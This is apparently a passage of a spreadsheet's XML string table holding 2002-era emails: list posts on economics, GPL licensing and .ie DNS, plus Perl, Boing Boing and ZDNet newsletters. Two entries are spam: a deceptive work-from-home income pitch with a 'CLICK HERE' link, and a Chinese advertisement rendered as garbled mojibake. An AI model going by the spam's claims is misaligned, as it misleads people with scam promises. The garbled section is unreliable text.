 approaches of the IT industry (cheaper, better or you die) and the 
 telecom industry (maintain your
 monopoly through regulation, and get guaranteed price increases through 
 the same regulators) meet.
 Sadly to say, the telecom industry seems to have won. The whole 
 entertainment industry/RIAA/Palladium thing
 seems to be another instance where actually giving value to the customer 
 seems less important than using
 regulation to reduce competition and substitute products in order to 
 produce profits for the favored few.
 &gt;
 &gt;In short, then, economics is not a zero sum game, property is not
 &gt;theft, the rich don't get rich off the backs of the poor, and
 &gt;redistributionist labor "theory" of value happy horseshit is just
 &gt;that: horseshit, happy or otherwise.
 &gt;
 &gt;To believe otherwise, is -- quite literally, given the time Marx
 &gt;wrote Capital and the Manifesto -- romantic nonsense.
 &gt;  
 &gt;
 I usually agree - but when there's a Republican in office -  I feel like 
 they're the biggest believers in
 the Manifesto, in reverse. Create a reserve pool of labor, reduce the 
 rights of that "proletariat" you've
 just created with bogus "law and order" policies , concentrate capital 
 in the hands of a few (ideally people
 who can get you reelected) and the economy will take care of itself. Oh, 
 and lie - use
 the word "compassionate" a lot. I guess I tend to believe that a certain 
 amount of poverty reduction actually
 helps a modern capitalist state - the basic economic tenet of the 
 Republic party seems to be the more homeless under
  each overpass, the more efficient the rest of us will be.
 And the facts are, for most people in the Western world  are declining 
 standards of living, declining benefits, disappearing social safety net,
 greater working hours,  essentially since the entrance of women into the 
 work force (not blaming women in any way, they have a right
  to work but its now 2 wage-earners in each family and still declining 
 standards of living) is the reality.
 Again to quote that wonderfully liberal document I keep coming back to - 
 the CIA world factbook - on the US economy:
 "Since 1975, practically all the gains in household income have gone to 
 the top 20% of households"
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-30
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Installing Perl 5.8.0 on Mac OS X 10.2
 +--------------------------------------------------------------------+
 | Installing Perl 5.8.0 on Mac OS X 10.2                             |
 |   posted by pudge on Thursday August 29, @15:03 (releases)         |
 |   http://use.perl.org/article.pl?sid=02/08/29/193225               |
 +--------------------------------------------------------------------+
 [0]Morbus Iff writes "The newest release of Apple's operating system, Mac
 OS X v10.2 (Jaguar) comes with perl 5.6.0, surprisingly old for their
 latest offering. In an [1]Internet Developer article, I walk the Mac OS X
 user through installing perl 5.8.0, and as well provide a brief
 introduction to CPAN."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/29/193225
 Links:
     0. mailto:morbus@disobey.com
     1. http://developer.apple.com/internet/macosx/perl.html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</si>
  <si>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Mathematics film-festival in October in Berkeley
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516333
 Date: Not supplied
 All through October, Berkeley's Mathematical Sciences Research Institute is 
 hosting Cinemath, a mathematics film festival: 
     Permutations and Configurations: A Calculated Cinema 
     In this avant-garde subset of Cinemath, we explore films that have been 
     constructed using mathematical concepts both simple and complex- geometric 
     permutations, musical frameworks, even topography are among the strategies 
     that have been employed to compose and sequence film frames. Filmmakers 
     such as Oskar Fischinger and Walther Ruttmann created some of the earliest 
     avant-garde films by multiplying, dividing, and otherwise transforming 
     abstract images- including spirals, rectangles, and circles to produce 
     dynamic rhythms and harmonies. Today such visual music and motion graphics 
     are the currency of digital graphics. Anthony McCall's film performances 
     such as Line Describing a Cone create 3-D geometric shapes into which the 
     viewer can literally step. We also explore films by pioneers of 
     machine-generated and computer-produced animation (Norman McLaren, James 
     and John Whitney, Stan Vanderbeek) as well as works by contemporary 
     animators who use the computer to either generate or pattern images (Larry 
     Cuba, Paul Glabicki, James Otis). Peter Kubelka, Taka Iimura, and Standish 
     Lawder use the frame as the unit with which they create editing patterns, 
     while Kurt Kren and Paul Sharits reckon on arithmetic systems to variously 
     calculate compositional or editing patterns. Bette Gordon, Hollis Frampton, 
     and Bruce Elder figure in algorithms, group theory, and set theory to 
     graphically enliven the frame or to structure their films. While no 
     mathematical knowledge is required to enjoy these films, we count on you to 
     try to calculate the mathematical systems employed!  
 Link[1] Discuss[2] (_Thanks, Jef[3]!_)
 [1] http://www.msri.org/20thanniversary/cinemath.html
 [2] http://www.quicktopic.com/boing/H/Adiw2xL5kw8ug
 [3] http://www.acme.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:48:18AM +0100, wintermute mentioned:
 &gt; How unimaginably difficult is this to do?  There are as far as I know,
 &gt; no Linux kernel hackers, nor distros that originate from this fair
 &gt; island right?  Right.
  Antefacto Embedded Linux...did.
  Nice little distro that'd run on a 64MB flash card (with 12MB free), with
 a read-only root filesystem. Perfect for little embedded systems. It was a
 very cut down version of RedHat 7.2.
  Must see can we release the build system &amp; everything. That was the
 interesting bit. Distros, in general, are a waste of time. You've no idea
 how much better something like Debian or RedHat could be than something
 you did yourself, unless you picked a niche area.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A brand new  opportunity to work from home! -lrmjq
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;&lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;&lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;&lt;title&gt;New Page 1&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;p class="MsoBodyText" align="center"&gt;&lt;i&gt;&lt;span style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:&amp;quot;Bookman Old Style&amp;quot;;
 color:red"&gt;&lt;b style="mso-bidi-font-weight: normal; font-size: 11.0pt; mso-bidi-font-size: 10.0pt; font-family: Bookman Old Style; color: red"&gt;&lt;font size="5"&gt;Take Control of Your Life &lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;&lt;p class="MsoBodyText" align="center"&gt;&lt;i&gt;&lt;span style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:&amp;quot;Bookman Old Style&amp;quot;;color:red"&gt;&lt;b style="mso-bidi-font-weight: normal; font-size: 11.0pt; mso-bidi-font-size: 10.0pt; font-family: Bookman Old Style; color: red"&gt;&lt;font size="5"&gt;Today
 and Make the Money that you Deserve!&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;b style="mso-bidi-font-weight:normal"&gt;&lt;span style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:&amp;quot;Bookman Old Style&amp;quot;;color:red"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoBodyText"&gt;&lt;b style="mso-bidi-font-weight:normal"&gt;&lt;span style="font-size:16.0pt;mso-bidi-font-size:10.0pt;color:maroon"&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoBodyText2" align="center" style="text-align:center"&gt;Welcome to the last stop in your search for a true and total Money Making Opportunity. We have
 studied Marketing for years and have finally come to where we are able to deliver to you the most complete package available today!&lt;/p&gt;&lt;p class="MsoNormal" align="center" style="text-align:center"&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p class="MsoNormal" align="center" style="text-align:center"&gt;&lt;b&gt;&lt;span style="font-family:&amp;quot;Bookman Old Style&amp;quot;"&gt;If you are looking for&lt;span style="mso-bidi-font-style:italic"&gt; unlimited income
 potential &lt;/span&gt;then this is the chance for you. &lt;span style="color:red"&gt;THIS IS A REAL BUSINESS&lt;/span&gt;, not Multi-Level-Marketing, Network Marketing or any other type of business that you have seen in the past. It is a &lt;span style="mso-bidi-font-style:italic"&gt;complete state of the art system that&lt;/span&gt; comes complete with everything that you need to succeed. &lt;/span&gt;&lt;/b&gt;&lt;b style="mso-bidi-font-weight:normal"&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="border:none;border-bottom:double windowtext 2.25pt;padding:0in 0in 1.0pt 0in"&gt;&lt;p class="MsoNormal" align="center" style="text-align:center;border:none;mso-border-bottom-alt:double windowtext 2.25pt;padding:0in;mso-padding-alt:
 0in 0in 1.0pt 0in"&gt;&lt;span style="font-family:&amp;quot;Bookman Old Style&amp;quot;"&gt;&lt;span style="mso-spacerun: yes"&gt;&amp;nbsp;&lt;/span&gt;&lt;b style="mso-bidi-font-weight:normal"&gt;&lt;i&gt;FIND OUT HOW TO CAPTURE THE MOST EXCITING OPPORTUNITY IN YEARS!&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" align="center" style="text-align:center;border:none;mso-border-bottom-alt:double windowtext 2.25pt;padding:0in;mso-padding-alt:0in 0in 1.0pt 0in"&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p class="MsoNormal" align="center" style="text-align:center;border:none;mso-border-bottom-alt:double windowtext 2.25pt;padding:0in;mso-padding-alt:
 0in 0in 1.0pt 0in"&gt;&lt;u&gt;&lt;span style="color:blue"&gt;&lt;a href="http://host.1bulk-email-software.com/ch2/trusty/index.html"&gt;&lt;font size="4"&gt;&lt;b style="mso-bidi-font-weight: normal; color: blue"&gt;CLICK HERE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;&lt;p class="MsoNormal" align="center" style="text-align:center;border:none;mso-border-bottom-alt:double windowtext 2.25pt;padding:0in;mso-padding-alt:0in 0in 1.0pt 0in"&gt;&amp;nbsp;&lt;/p&gt;&lt;p class="MsoNormal" align="center" style="text-align:center;border:none;mso-border-bottom-alt:double windowtext 2.25pt;padding:0in;mso-padding-alt:0in 0in 1.0pt 0in"&gt;&amp;nbsp;&lt;/p&gt;&lt;p class="MsoNormal" align="center" style="text-align:center;border:none;mso-border-bottom-alt:double windowtext 2.25pt;padding:0in;mso-padding-alt:0in 0in 1.0pt 0in"&gt;&amp;nbsp;&lt;/p&gt;&lt;/div&gt;
 &lt;p class="MsoNormal" style="BORDER-RIGHT: medium none; PADDING-RIGHT: 0in; BORDER-TOP: medium none; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; BORDER-LEFT: medium none; PADDING-TOP: 0in; BORDER-BOTTOM: medium none; mso-border-bottom-alt: double windowtext 2.25pt; mso-padding-alt: 0in 0in 1.0pt 0in" align="center"&gt;&lt;font color="#800080" size="4"&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;AUTOMATED
 REMOVAL INSTRUCTIONS&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="BORDER-RIGHT: medium none; PADDING-RIGHT: 0in; BORDER-TOP: medium none; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; BORDER-LEFT: medium none; PADDING-TOP: 0in; BORDER-BOTTOM: medium none; mso-border-bottom-alt: double windowtext 2.25pt; mso-padding-alt: 0in 0in 1.0pt 0in" align="center"&gt;This
 message is intended for individuals who have an interest in financial and money matters.&amp;nbsp; If this message has reached you in error, and you want to be removed from our mail agents database, &lt;a href="mailto:magnumslug_357@yahoo.com"&gt;CLICK HERE&lt;/a&gt; and &lt;font color="#ff0000"&gt;&lt;b&gt;&lt;i&gt;TYPE YOUR EMAIL ADDRESS IN THE SUBJECT HEADER.&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&amp;nbsp; Your address will be automatically removed from our mail agents master database.&lt;/p&gt;
 &lt;p class="MsoNormal" style="BORDER-RIGHT: medium none; PADDING-RIGHT: 0in; BORDER-TOP: medium none; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; BORDER-LEFT: medium none; PADDING-TOP: 0in; BORDER-BOTTOM: medium none; mso-border-bottom-alt: double windowtext 2.25pt; mso-padding-alt: 0in 0in 1.0pt 0in" align="center"&gt;Thanks for your time :)&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?GB2312?B?uOW8/qO60rDC+cWu09FWU6G2xKe57dOi0++htw==?=
</t>
  </si>
  <si>
    <t xml:space="preserve">ҰŮVSħӢ
 101ƼħӢ
 йƼħӢ 
 (FLASH)ĸһ
 ҰŮϲй
 ҰŮϲ
 eʱͲп
 Flashּ&amp;ħӢ
 Flashּ"ʷǿֻ֮"
 ħӢ"ѧ﷨ ñ"ҲܿӢԭ桰Ƭ
           սѧħӢ
 =====================================
 Flashּ"ʷǿֻ֮"
 Flashּ лֿ⡷Flash棬ǡлֿ⡷°汾ϵйЭԱκȺʱʮ꣬ʾ޴ɵһ׳ĸԻֿ⣬Ϊʷǿֻ֮桱
 ƳġFlashּ¼1000ǧTRUETYPEͣĿǰȫͻơǧסʹصֻĵֿ⣬ҲΨһܹṩǧ׼ĸԻϵͳƽ̨ǡeʱչѡƽ̨
 ڳʮз̵УйؼԱ˷ѣһϵͳѧĺ̬оۡѧģͼʵ÷ȫ׸͵ĺ̬֪ʶ⣬600GĿǰȫĺ̬֪ʶ⡣
  ҵҪϣͳ⣬Ҫ¿дͼ͡
  лֿ⡷ṩ˴ԭԭ"¿д"""磺塢չ塢ֽ塢ľ塢ʯӡ塢塢ͯ塢塢ݮ塢塢ȵȡ繫˾ҵרҵʦѡԻƽ̨ƽ̨
  ĿǰгѾƷtruetype͵У90%ϵɡлֿ⡷ṩȫԭԭͣȫ֪ʶȨ 
  =====================================
    ħӢ
 ħӢ,ԭСͻӢӢƽСeEnglishһעʵЧӢ޿γ̡
 ħӢ"ѧ﷨ ñ"ѧص㣬ͳҲܿӢԭ桰ƬǿЧܣѸٳΪʽӢ＼ѧϰѡܵ101йĹͬƼ 
  ħӢѧϰǿȺѧϰЧͨӢ̲ĵĿǰħ ӢѾ߱2000M˫ĶϺͽ50СʱMP3̲.
 ϣ¡վ
 =====================================
 =  
 =  վ㣺http://www.eChinaEdu.com
 =  վ㣺http://www.eChinaEdu.vicp.net
 =  ̳վ㣺http://qlong2008.xilubbs.com
 =  
 =====================================
 &lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;FRAMESET border=0 frameBorder=0 frameSpacing=0 rows=100%,*&gt;&lt;FRAME marginHeight=5 marginWidth=10 name=easymain src="http://www.echinaedu.com"&gt;&lt;/FRAMESET&gt;&lt;/html&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 01:40:21AM +0200, Paul Linehan wrote:
 &gt; 
 &gt; Rick Moen &lt;rick@linuxmafia.com&gt; a crit:
 ...
 &gt; &gt; You're further confused if you think the GNU 
 &gt; &gt; GPL gives you the right to get covered software
 &gt; &gt; for free.  It does not.  
 &gt; 
 &gt; All I want is the OS and GNU apps. I was under
 &gt; the impression that for *_those_* all one
 &gt; needed was to pay for the media and not for the
 &gt; code itself?
 &gt; 
 &gt; Ai-je tort?
 &gt; 
 &gt; 
 &gt; &gt; It provides that _if_ you've lawfully received
 &gt; &gt; a copy of the covered binary version, you have
 &gt; &gt; rights to also receive the matching source code.
 &gt; 
 &gt; My understanding was that binaries or whatever
 &gt; could be received for the cost of the media plus
 &gt; a token of one's appreciation (the latter being
 &gt; subject to agreement between the parties) - I was
 &gt; offering a bottle of wine plus maybe a pint or two
 &gt; and a chat for a copy - I don't know what the going
 &gt; rate is.
 The GPL makes no stipulations about charging for binaries.
 In fact, you can go get the sources for, say, GNU's /bin/true,
 compile it yourself and try selling the resulting binary
 for EUR 1000.  (And, with a good enough sales pitch, you
 just might get away with it!)
 However, what the GPL does stipulate is that you must 
 provide the sources for that binary if asked.  So I might
 buy it from you for EUR 1000, compile it myself and sell
 that binary for EUR 1.  Of course, I'll need to provide
 the sources to anyone that asks as well.  But, I just
 might make money at this, since there might be a market of
 10000 people who would pay 1 euro for the convenience of
 getting a binary.
 But then, John Looney would step in, buy it from me for
 1 euro, burn it and the sources and some of his favourite
 /bin/true patches on a CD and duplicate it for the cost of
 the media or a cream bun, depending on how hungry he is.
 You see, the GPL doesn't force the binaries to be zero-cost
 (or cost-of-media), but it puts a really big hole in any
 business plan that solely resells GPL software.  You _can_
 charge for it if you want, but you bloody well better be
 providing some value for that money, or you'll go out of
 business faster than a dot-com in 2001.
 And there are real ways to provide this value for money
 (convenience of getting it on one CD, convenience of a
 friendly installer, convenience of vendor-supplied updates,
 convenience of having what lots of other people have,
 posting a CD and paying a few euro is cheaper than downloading
 over a modem, warm fuzzy feeling of getting something from
 a "real" company, etc).
 There will be segments of the market that will pay various
 amounts for GPL software and there will be others that don't.
 Thankfully, the GPL allows for both, _by_design_.  But the
 source will always be free (or minimal cost).
 Later,
 Kenn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">James Raftery wrote:
 &gt; 
 &gt; Hi,
 &gt; 
 &gt; Four of the IE nameservers are publishing out of date DNS information.
 &gt; The four listed below are publishing the IE zone from last Friday.
 &gt; They are six days behind reality.
 James,
 Last week, when indexing stuff for WhoisIreland.com, I noticed that
 ns0.domainregistry.ie and banba.domainregistry.ie were out of synch by a
 few days. The other nameservers seemed to give a current SOA at that
 time. However the affected secondaries may have been using
 ns0.domainregistry.ie for axfr and propagated the error.
 This whole thing does seriously bring into question IEDR's decision to
 outsource the technical admininstration of .ie to a company that
 apparently does not even admin its own DNS.  It is a nice story though -
 almost as good as the time that .ie disappeared for 8 hours in July
 1998.
 Regards...jmcc
 -- 
 ********************************************
 John McCormac            * Hack Watch News
 jmcc@hackwatch.com       * 22 Viewmount, 
 Voice:   +353-51-873640  * Waterford,
 BBS&amp;Fax: +353-51-850143  * Ireland
 http://www.hackwatch.com/~kooltek
 ********************************************
 -----BEGIN PGP PUBLIC KEY BLOCK-----
 Version: 2.6
 mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+
 ZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz
 TRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX
 tCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3
 YXRjaC5jb20=
 =sTfy
 -----END PGP PUBLIC KEY BLOCK-----
 _______________________________________________
 Irish Internet Users mailing list
 Irish Internet Users@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Tech Update Today&lt;/title&gt;
 &lt;/head&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt;
 &lt;div align="center"&gt;
 &lt;!-- main --&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;table width=612 bgcolor="#232850" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr valign=bottom&gt;
 &lt;td width=440 colspan=4&gt;&lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpW7B4RlTh3wiOPYOLipujlR" &gt;&lt;img src="http://www.zdnet.com/techupdate/i/itnewsletter_today.gif" width="440" height="60" border="0"  alt="Tech Update Today"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;!--tower --&gt;
        &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2766" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
         &lt;!-- tower --&gt;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border=0&gt;
         &lt;tr valign=top&gt;
         &lt;td width=7 rowspan=2&gt;&lt;img src="http://www.zdnet.com/b.gif" width=7 height=1&gt;&lt;/td&gt;
         &lt;td width=248&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/dots248.gif" width="248" height="5"&gt;&lt;br&gt;
         &lt;div align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPMW6kg4BsnOIRzw0LGkk4R" &gt;&lt;img src="http://www.zdnet.com/techupdate/i/news_tech_header.gif" width="248" height="24" vspace="6" border=0 alt="Tech Update Today"&gt;&lt;/a&gt;&lt;br&gt;&lt;/div&gt;
         &lt;!--DATE--&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/dots248.gif" width="248" height="5"&gt;&lt;br&gt;
         &lt;div align="center"&gt;&lt;font face="ms sans serif, geneva" size="-2" color="#666666"&gt;VITAL SIGNS FOR JULY 18, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/dots248.gif" width="248" height="5"&gt;&lt;br&gt;
         &lt;img src="http://www.zdnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;!--LEDE ART--&gt;		
 &lt;table cellpadding=0 cellspacing=0 border=0 align=left&gt;
 &lt;tr valign=top&gt;&lt;td width="90"&gt;&lt;img src="http://image.com.com/techupdate/i/dfarber.jpg" width="85" height="110" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
  &lt;/table&gt;
 &lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;Dan Farber&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13zXvhPz1kOqFb2GVaGyR" &gt;
 &lt;b&gt;Gaga for Google? When results don't count&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 When my Web search on a leading IT exec came up almost empty, what was I to think? As it turns out, the lack of Web tracks is not necessarily a sign of irrelevance.
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jxOqwljPWvurMPGPxZ6RlR" &gt;
 	 &lt;b&gt;And it offers a lesson or two&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;
 &lt;br&gt;
    &lt;/font&gt;
         &lt;img src="http://www.zdnet.com/b.gif" width=1 height=8&gt;&lt;br&gt;
         &lt;/td&gt;
         &lt;td width=5 rowspan=2&gt;&lt;img src="http://www.zdnet.com/b.gif" width=5 height=1&gt;&lt;/td&gt;
         &lt;td width=5 bgcolor="#fffff3" rowspan=2&gt;&lt;img src="http://www.zdnet.com/b.gif" width=5 height=1&gt;&lt;/td&gt;
         &lt;td width=160 bgcolor="#fffff3" rowspan=2&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=7&gt;&lt;br&gt;
         &lt;font face="verdana, arial" size="-2"&gt;
 &lt;!---- HEADLINES----&gt;
  &lt;b&gt;Latest from ZDNet News&lt;/b&gt;&lt;br&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cTyIiO6WmDblRuaBDxRU4R" &gt;Unisys servers shape up for Itanium 2&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzwpG8VIJgwzk0xBfd-8WrR" &gt;Linux to enter supercomputing top five&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idnjk7JBmareVXCHnpqL0wRR" &gt;U.S. wants your mailman to snoop on you&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJjcIFrkldqm86ccJ_2d2ZR" &gt;Motorola: Gloomier outlook for handsets&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeW6ZS97vcbzceCGFySNP8dR" &gt;Yahoo Mail swaps out JavaScript words&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIPiqGbaxkO9IO3JewkhBpuR" &gt;TI boosts Sun's UltraSparc chip&lt;/a&gt;&lt;br&gt;
  &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKmPU5trBr1yZeU_u_KnPR" &gt;PC slump drives AMD deeper into the red &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1CWO_1iWLXZBXqONOVnR" &gt;
 &lt;b&gt;More Enterprise News&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=6 width=1&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td width=3 bgcolor="#fffff3" rowspan=2&gt;&lt;img src="http://www.zdnet.com/b.gif" width=3 height=1&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.zdnet.com/techupdate/i/dots249.gif" width=248 height=5&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;/table&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=10&gt;&lt;br&gt;
  &lt;!---- HEADLINES----&gt;   
 &lt;!---Editors choice---&gt;    
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;      
 &lt;!--- DAVID'S PICKS ---&gt;
 &lt;font size="+1" color="#990000"&gt;&lt;b&gt;David's Picks&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;
                 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;
                 &lt;tr&gt;
 &lt;td bgcolor="#cccccc"&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
            &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="4"&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
                 &lt;/table&gt;
 			    &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
                 &lt;td&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/dberlind.gif" width="85" height="110" border="0"&gt;
 &lt;BR&gt;
 &lt;div align="center"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 David&lt;br&gt;Berlind&lt;/font&gt;&lt;/div&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/dots75.gif" width=75 height=5&gt;
                 &lt;/td&gt;
                 &lt;td width=10&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--STORY 1--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Group proposes PC protection guarantees&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Several &lt;b&gt;U.S. government&lt;/b&gt; agencies have teamed with an international Internet security organization to support a set of 
 benchmarks aimed at guaranteeing a &lt;b&gt;minimum security standard&lt;/b&gt; for computers. While &lt;b&gt;Windows 2000&lt;/b&gt; workstations are 
